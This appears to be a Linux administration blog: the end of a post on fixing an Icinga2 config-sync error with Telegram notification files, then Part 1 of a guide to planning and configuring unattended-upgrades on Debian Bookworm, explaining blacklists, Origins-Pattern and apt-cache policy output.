/var/lib/icinga2/api/zones-stage//global-commands/_etc/telegrambot-commands.conf(21):     TELEGRAM_CHAT_ID = "$user.vars.telegram_chat_id$"
/var/lib/icinga2/api/zones-stage//global-commands/_etc/telegrambot-commands.conf(22):

[2024-07-21 16:28:51 +0200] critical/config: Error: Error while evaluating expression: Tried to access undefined script variable 'TelegramBotToken'
Location: in /var/lib/icinga2/api/zones-stage//global-commands/_etc/telegrambot-commands.conf: 46:26-46:41
/var/lib/icinga2/api/zones-stage//global-commands/_etc/telegrambot-commands.conf(44):     HOSTDISPLAYNAME = "$host.display_name$"
/var/lib/icinga2/api/zones-stage//global-commands/_etc/telegrambot-commands.conf(45):     SERVICEDISPLAYNAME = "$service.display_name$"
/var/lib/icinga2/api/zones-stage//global-commands/_etc/telegrambot-commands.conf(46):     TELEGRAM_BOT_TOKEN = TelegramBotToken
                                                                                                               ^^^^^^^^^^^^^^^^
/var/lib/icinga2/api/zones-stage//global-commands/_etc/telegrambot-commands.conf(47):     TELEGRAM_CHAT_ID = "$user.vars.telegram_chat_id$"
/var/lib/icinga2/api/zones-stage//global-commands/_etc/telegrambot-commands.conf(48):

[2024-07-21 16:28:51 +0200] critical/config: 2 errors
[2024-07-21 16:28:51 +0200] critical/cli: Config validation failed. Re-run with 'icinga2 daemon -C' after fixing the config.

The solution

On the master I moved the 2 files from /etc/icinga2/zones.d to /etc/icinga2/conf.d and restarted the service.

root@master:/etc/icinga2# mv /etc/icinga2/zones.d/global-commands/telegrambot-commands.conf /etc/icinga2/conf.d/
root@master:/etc/icinga2# mv /etc/icinga2/zones.d/global-templates/telegrambot-notifications.conf /etc/icinga2/conf.d/
root@master:/etc/icinga2# systemctl restart icinga2.service

On the agent a simple restart is enough:

root@agent:/etc/icinga2# systemctl restart icinga2.service

And after that everything worked again.

Another problem detected - an even deeper rooted cause

In the aftermath I was curious why & how Icinga didn't notify me that the config in the stage-dir couldn't be validated. Shouldn't there be some kind of included check for this?

Yes, it turns out the built-in icinga CheckCommand does exactly this. But it was never executed on my agents, as I still had a service definition from a time when I didn't have any agents. Initially the configuration was the following:

// Checks the agent health
apply Service "icinga" {
  import "generic-service"

  check_command = "icinga"

  assign where (host.address || host.address6) && host.vars.os == "Linux"
}

This was still a remnant of having only the Icinga master and no agents. But it led to the check being executed on the master. Which is... not smart if you want to validate the configuration on the agents.

After changing it to the following:

// Checks the agent health - must be executed on the agent
apply Service "icinga" {
  import "generic-service"

  check_command = "icinga"

  command_endpoint = host.vars.agent_endpoint

  assign where host.vars.agent_endpoint
}

The check worked as intended.

Oh, and I opened a pull request to enhance Icinga's documentation regarding the config sync: https://github.com/Icinga/icinga2/pull/10101. Let's see if it gets accepted.


Using and configuring unattended-upgrades under Debian Bookworm - Part 1: Preparations

Photo by Markus Winkler: https://www.pexels.com/photo/wood-writing-mathematics-typography-19915915/

Preface

At the time of this writing Debian Bookworm is the stable release of Debian. It utilizes Systemd timers for all automation tasks like the updating of the package lists and execution of the actual apt-get upgrade. Therefore we won't need to configure APT-Parameters in files like /etc/apt/apt.conf.d/02periodic. In fact some of these files don't even exist on my systems. Keep that in mind if you read this article along with others, who might do things differently - or for older/newer releases of Debian.

Part 2 can be found here: Using and configuring unattended-upgrades under Debian Bookworm - Part 2: Practise

unattended-upgrades is not your enemy

I've read and heard my fair share of people condemning unattended-upgrades as it:

  • Made things unnecessarily complicated
  • Broke the system
  • Ignored APT-Pinnings and caused problems because of that
  • Just didn't work
  • Caused problems with High Availability (HA) services
  • Made the database fail
  • Caused split-brains solely because it restarted services
  • Restarted services during work hours causing disruptions and annoyances

You should get the gist. And then there is my experience, running unattended-upgrades on over 6000 Debian servers running all sorts of services. From Apaches, Tomcats, JBoss and HAProxy to DRBD, GlusterFS, Corosync, Pacemaker, some NoSQL DBs and services like keepalived and ipvsadm for Layer 2/3 load balancing or Quagga/FRR for BGP route announcements. And in all those years unattended-upgrades wasn't the root cause of a single problem, outage or incident.

Therefore I suspect that many of the people whose complaints I've read just installed it and never cared about it again. Or, at least, didn't care enough. Presumably they just wanted a quick solution to help them get their systems updated. Well yes, unattended-upgrades is the right tool for this. But as always:

Know your system and plan accordingly!

Things to consider beforehand

Let me give you a list of things to consider before you even install unattended-upgrades.

  1. Are all of your APT-Repositories in order?
    • GPG-keys valid and present?
    • Correct repository for your Debian release?
    • Do you use only official Debian repositories?
    • Do you use Debian repositories from other projects/vendors?
    • Are your repositories in sync on all your servers?
      • Preferably you use the same Debian Mirror on all of your systems. At least make sure you don't use different repositories for security and system updates across all your Debian systems.
      • This prevents problems from outdated mirrors. Happens rarely, but can happen.
        • Trust me: When 2 machines out of a cluster of 5 behave differently, your first thought or troubleshooting step won't be to check if the different Apt-Repositories have the same content
      • Remember: Those are often provided as-is by volunteers. They are NOT a commercial service. And yet most of these volunteers do an exceptional & awesome job despite not being paid for it.
      • Best case scenario: Your company has an internal Debian Mirror. Saving you money on bandwidth usage.
      • Have a look at https://www.debian.org/mirror/ftpmirror.en.html or Aptly if you plan on setting up a mirror.
    • Basically: If an apt-get update prints out anything other than your configured repositories, followed by the line Reading package lists... Done: Fix your repositories!
    • Yes, you can have vendors with broken Debian repositories. Most often the Release file will be buggy or missing entirely. If you can't get your vendor to fix it, well, then the best option is to not specify the repository at all and ensure you have another form of automation to update those packages.
      • Sadly a wget http://some-company.tld/some.deb && dpkg -i some.deb is still considered valuable quality work at far too many enterprise software companies out there..
        • Or you just work around that nuisance, create an internal repository yourself and upload the packages there.
      • A good time to remind them that you pay them and that you need a fully working Debian repository, following the Debian guidelines so you can automatically patch all your systems.
    • Do NOT continue otherwise. You have been warned.
  2. What kind of services does your system provide?
    • Here it is essential to know what the system does. Technically and organizationally.
    • What services are provided, why, to whom?
    • Are there any Service Level Agreements (SLAs) in place?
      • Do downtimes of a service need to be scheduled first?
      • Or can service restarts happen at any time?
      • Also automatically? Or is human supervision required by law/standards? (Looking at you PCI DSS (Wikipedia) 😉)
      • Or is there already an agreed upon maintenance window during which the service is allowed to be unresponsive?
    • Do all services have High Availability (HA)?
      • Do the service(s) survive if the primary/master/main system is shut down?
      • How many systems can be unavailable at the same time?
      • Or do other tasks need to be done (manually) on secondary/slave/standby systems?
      • Does your failover work?
      • Is the failover tested regularly?
    • How are you informed if the service(s) stop responding?
      • Is your monitoring set to check right after updates did happen? (You can specify the time when unattended-upgrades does install the updates.)
  3. This will enable you to classify all your installed packages into the following categories for unattended-upgrades:
    • Can be updated anytime
    • Can be updated at certain times / Only a certain number of systems is allowed to be unavailable at any time
      • See: systemctl list-timers especially apt-daily-upgrade.timer and maybe apt-daily.timer
    • Only manual updates (Blacklisting)
      • Unattended-Upgrade::Package-Blacklist in /etc/apt/apt.conf.d/50unattended-upgrades is your friend (a short example follows after this list)
      • Then execute apt-get update && apt-get upgrade manually to update the blacklisted packages
    • Never update this package / We need a specific version
      • This will need blacklisting AND APT-Pinnings to be in place
      • As an apt-get update && apt-get upgrade can still be executed manually
  4. In certain situations (HA-Nodes, manually triggered fail-over, etc.) you will need to run specific commands before or after a package update.
    • This is something unattended-upgrades can't help you with
    • Sometimes these are commands which should be included in the Debian package itself. Namely in the preinst, prerm, postinst and postrm files. The so-called package maintainer scripts (Official Debian documentation).
      • But more often the commands are customer/environment specific and adding them to the maintainer script makes no sense or can even cause disruptions in the service.
    • A feasible workaround is the utilisation of a drop-in file if your service is started via a Systemd unit file, see https://www.freedesktop.org/software/systemd/man/latest/systemd.unit.html and search for "drop-in". The ArchWiki also has a good article: https://wiki.archlinux.org/title/systemd#Drop-in_files - but keep in mind that Arch may use different paths than Debian. (A small sketch follows after this list.)
    • If the correct procedure is missing from the package, or isn't suitable for your environment.. Then it's best to exclude the packages from unattended-upgrades and get yourself some tool like Ansible, Puppet or Rundeck to automate the execution of manual tasks. (God, how I love Rundeck. 🥰) There you are able to ensure everything is valid and verified before switching your primary cluster node and running package updates.
  5. If you have some kind of ITIL ChangeManagement process in place this, of course, also can't be checked by unattended-upgrades
    • The only viable solution would be to have different repositories based on your environment classifications (development, QA testing, production) or approval classifications (untested, testing, approved) and push packages to the corresponding repository once the ChangeManagement process is completed
    • Then you can install the updates automatically from there
  6. Unattended-Upgrades is great! But you can't automate every single scenario by just using it!
    • Sometimes this even means to go back to the drawing board and optimise your internal company processes first. Especially in situations where approvals have to be given manually by real humans
  7. When you start rolling out unattended-upgrades it's better to have an overview first of how many patches are missing on each server. The more updates you install, the more likely it is that things will change or even break. Or maybe it's just those informational log messages telling you that some parameter or option will be deprecated in the next major release.
    • I advise to start with non-critical systems first
    • Ideally systems which are somewhat up-to-date so you can identify & troubleshoot problems easier
    • It's perfectly fine to update all systems manually first and only then enable unattended-upgrades
      • As then you will have a common ground for all your systems and bugs are easier to identify as the same bug will affect all systems at somewhat the same time
  8. You need to have a quick & easy, bureaucracy-free process to add packages to the blacklist
    • There once were broken corosync and keepalived packages in Debian in the early 2010s
    • Once we saw that, we immediately added them to the blacklist and downgraded the other systems where the update was already installed
    • You don't want to spend one hour on the phone frantically trying to reach a member of your Change Advisory Board to greenlight the change which lets you modify the blacklist while unattended-upgrades happily wrecks one system after another
  9. Point 8 sets a requirement: How do you roll out a new blacklist/config for unattended-upgrades to 6000 servers in under 15 minutes?
    • You are too slow to do that manually, no matter how fast you can type
    • for HOST in $(cat host-list.txt); do ssh $HOST some-command; done? Yeah... No. It works, sure... But.. Come on, really? And this does only one host at a time.. Still taking too long.
    • You do want something like Puppet, Ansible or Rundeck for this very reason.
      • Change the configuration in hiera
      • Commit it to git
      • Log in to Rundeck and execute the "Do a manually triggered Puppet/Ansible run" job
      • Then drink a coffee while you watch Rundeck doing its job and care for the 10 or so servers that will fail for various other reasons.
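
Coming back to point 3: a blacklist in /etc/apt/apt.conf.d/50unattended-upgrades could look roughly like the following. The package names are purely exemplary, and the entries are regular expressions, so anchor them if you need exact matches:

Unattended-Upgrade::Package-Blacklist {
        "corosync";
        "keepalived";
        "^linux-image-";
};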

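And regarding the drop-in files from point 4: a minimal sketch of such a drop-in, assuming a hypothetical service and helper script, could look like this:

root@host:~# mkdir -p /etc/systemd/system/myservice.service.d
root@host:~# cat /etc/systemd/system/myservice.service.d/10-failover.conf
[Service]
# Hypothetical helper script which moves the virtual IP away before the service is (re)started during an update
ExecStartPre=/usr/local/sbin/failover-to-secondary.sh
root@host:~# systemctl daemon-reload
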
Understanding apt-cache policy

The next thing that will help you vastly in providing a smoothly running unattended-upgrades service is understanding and using the apt-cache tool, especially with the policy argument: apt-cache policy. Even more so if you use Debian repositories from other projects or vendors.

Why? unattended-upgrades comes with some default configured Origins-Pattern in /etc/apt/apt.conf.d/50unattended-upgrades. These are usable for the official Debian security updates and for new point releases of Debian (12.5, 12.6, etc.), which incorporate all updates since the last point release. Non-security updates for installed packages between point releases won't be installed with the default configuration.

If you want these when they are ready, you have to uncomment the line for "origin=Debian,codename=${distro_codename}-updates";.

${distro_codename}-proposed-updates are updates which may not be stable yet. Read https://wiki.debian.org/StableProposedUpdates for the details. Personally I keep it disabled. Especially on production systems.

For Debian Bookworm the default Origins-Pattern are:

Unattended-Upgrade::Origins-Pattern {
[...]
//      "origin=Debian,codename=${distro_codename}-updates";
//      "origin=Debian,codename=${distro_codename}-proposed-updates";
        "origin=Debian,codename=${distro_codename},label=Debian";
        "origin=Debian,codename=${distro_codename},label=Debian-Security";
        "origin=Debian,codename=${distro_codename}-security,label=Debian-Security";
[...]
};

This means only packages matching these Origins-Pattern will be updated. Therefore you have to verify that these patterns include all packages you want to update and, additionally, that packages you do not wish to update are excluded. Although the use of the blacklist might be easier here, as this simply works on the name of the package.

Also note that codename=${distro_codename} is always part of an Origins-Pattern. It is important to not just use terms like stable or oldstable as these do not identify a unique distribution; they change whenever a new major Debian release happens. (This is also true if you are referencing OS images in things like Docker: debian:latest is most certainly a bad idea, debian:bookworm is better.)

Matching Origin-Patterns to apt-cache policy's output

How do you translate these Origins-Patterns into the lines apt-cache policy gives us?

Short side-note: apt-cache uses the metadata (repository information) obtained via apt-get update. Therefore it also works if the configured repositories are offline, but can also show outdated data if you haven't updated the package list information via apt-get update recently.

If executed you will see output like the following:

root@lanadmin:~# apt-cache policy
Package files:
 100 /var/lib/dpkg/status
     release a=now
 500 http://debian.tu-bs.de/debian bookworm-updates/non-free-firmware amd64 Packages
     release v=12-updates,o=Debian,a=stable-updates,n=bookworm-updates,l=Debian,c=non-free-firmware,b=amd64
     origin debian.tu-bs.de
 500 http://debian.tu-bs.de/debian bookworm-updates/main amd64 Packages
     release v=12-updates,o=Debian,a=stable-updates,n=bookworm-updates,l=Debian,c=main,b=amd64
     origin debian.tu-bs.de
 500 http://security.debian.org/debian-security bookworm-security/non-free-firmware amd64 Packages
     release v=12,o=Debian,a=stable-security,n=bookworm-security,l=Debian-Security,c=non-free-firmware,b=amd64
     origin security.debian.org
 500 http://security.debian.org/debian-security bookworm-security/main amd64 Packages
     release v=12,o=Debian,a=stable-security,n=bookworm-security,l=Debian-Security,c=main,b=amd64
     origin security.debian.org
 500 http://debian.tu-bs.de/debian bookworm/non-free-firmware amd64 Packages
     release v=12.5,o=Debian,a=stable,n=bookworm,l=Debian,c=non-free-firmware,b=amd64
     origin debian.tu-bs.de
 500 http://debian.tu-bs.de/debian bookworm/main amd64 Packages
     release v=12.5,o=Debian,a=stable,n=bookworm,l=Debian,c=main,b=amd64
     origin debian.tu-bs.de
Pinned packages:
root@lanadmin:~#

For the sake of simplicity, let us look at just this single line:

 500 http://security.debian.org/debian-security bookworm-security/non-free-firmware amd64 Packages
     release v=12,o=Debian,a=stable-security,n=bookworm-security,l=Debian-Security,c=non-free-firmware,b=amd64
     origin security.debian.org

I won't go over each and every single listed value. If you want to know more: man apt_preferences probably has all the details and apt-cache policy packagename lists all policies for a single package.

We want to pay attention to the second line, starting with release. Here we have the relevant values. These are defined in the Release file of each Debian release/repository. Documentation can be found here: https://wiki.debian.org/DebianRepository/Format#A.22Release.22_files

But what do they mean? man apt_preferences also explains them, but as they are relevant, let's make a short table.

Field            | Alias | unattended-upgrades variable | Description
Version          | v     | N/A                          | Contains the release version
Origin           | o     | ${distro_id}                 | Originator of the packages. (Debian if used for packages from the Debian project. If you have commercial packages most likely the company or product name will show up here.)
Archive or Suite | a     | N/A                          | Names the archive to which all the packages in the directory tree belong (on the repository server)
Codename         | n     | ${distro_codename}           | Codename of the Debian release. In our case: bookworm
Label            | l     | N/A                          | Names the label of the packages in the directory tree of the Release file
Component        | c     | N/A                          | The licensing component associated with the packages in the directory tree. You may know this as: main, contrib, non-free-firmware, etc.
Architecture     | b     | N/A                          | The processor architecture for which a package is compiled (amd64, i386, arm, etc.)

All this information is usually listed in the first 30 lines of /etc/apt/apt.conf.d/50unattended-upgrades. Therefore: Read it to ensure you get the currently valid information.

Understanding this makes it easy to match the configured Origins-Pattern to your configured Debian repositories.

If you are in doubt: Browse your Debian repository via HTTP/HTTPS and have a look at the Release file, for example: http://debian.tu-bs.de/debian/dists/bookworm/Release. The first 5 lines are:

Origin: Debian
Label: Debian
Suite: stable
Version: 12.5
Codename: bookworm

Filling in the variables we see that only the following Origin-Pattern matches:

"origin=Debian,codename=${distro_codename},label=Debian";

All others either have a different label and/or codename.

Looking at http://debian.tu-bs.de/debian/dists/bookworm-updates/Release we can see that this matches the following commented out Origin-Pattern:

"origin=Debian,codename=${distro_codename}-updates";

This means:

http://debian.tu-bs.de/debian/dists/bookworm/ holds all packages for the current point release of Debian Bookworm.
http://debian.tu-bs.de/debian/dists/bookworm-updates/ has all published updates which came out before a new point release is made. That is the reason why I always enable this repository too. But depending on your operating strategy, only installing updates when a new point release is published is also fine.

Security updates are always published via the http://security.debian.org/debian-security/ repository and will be installed when available. 

Key points / Story time

What you should have understood is:

  1. Each repository must be uniquely identifiable.
    • This means: Each Origins-Pattern should only match one of all your configured repositories
    • Of course you can have multiple repositories matching the same Origins-Pattern, but keep the possible implications in mind!
  2. Packages that share the same name must have the same content
    • And by content I mean: Their hashsums must be identical for each given version

If they don't, you are potentially in for a wild ride.

At a former company we used many internal repositories. And this was fine for a long time. Suddenly some developer started pushing Debian packages with the exact same name as official Debian packages to those internal repositories. We immediately complained, laying out how that could wreak havoc on our infrastructure, as we have to use those repositories and at the same time can't blacklist that package, since blacklisting works solely on the name of a package.

You can't do things like: "Blacklist package test-foo, but only if its coming from repository on repo.coolhost.tld"

We urged him to simply rename those packages or upload them to another repository - as those packages had to share the same name as they contained a not-yet included fix for a bug the company encountered. He wouldn't as he saw no problem with his approach. "Just don't use them." (Yeah thanks.. That's not how it works with automation.. Especially not if you - sort of - hijack repositories which are used for something entirely different..)

The workaround we implemented was to give each repository an APT priority, so packages from our internal official Debian mirror took precedence. That worked, but it was still annoying.
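
In case you wonder what such a priority looks like: we used an entry in /etc/apt/preferences.d/ roughly like the following (hostname and priority value purely illustrative, see apt_preferences(5) for the exact semantics):

root@host:~# cat /etc/apt/preferences.d/10-prefer-internal-mirror
Package: *
Pin: origin debmirror.internal.example.com
Pin-Priority: 600

A priority above the default of 500 means packages from this origin win against the other configured repositories, without forcing downgrades of already installed newer versions.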

Some weeks later those packages caused an incident and in the root cause analysis the problem was identified and those packages were moved to a separate repository.

Lesson learned. Care for your repositories.

And this ends the first part of this post. The next part will focus on the practical side. We will look at the Systemd Unit- and Timer-File, how we can add new repositories to unattended-upgrades, for example to also upgrade our Proxmox installation using the Proxmox Debian repositories, how to blacklist packages and more.
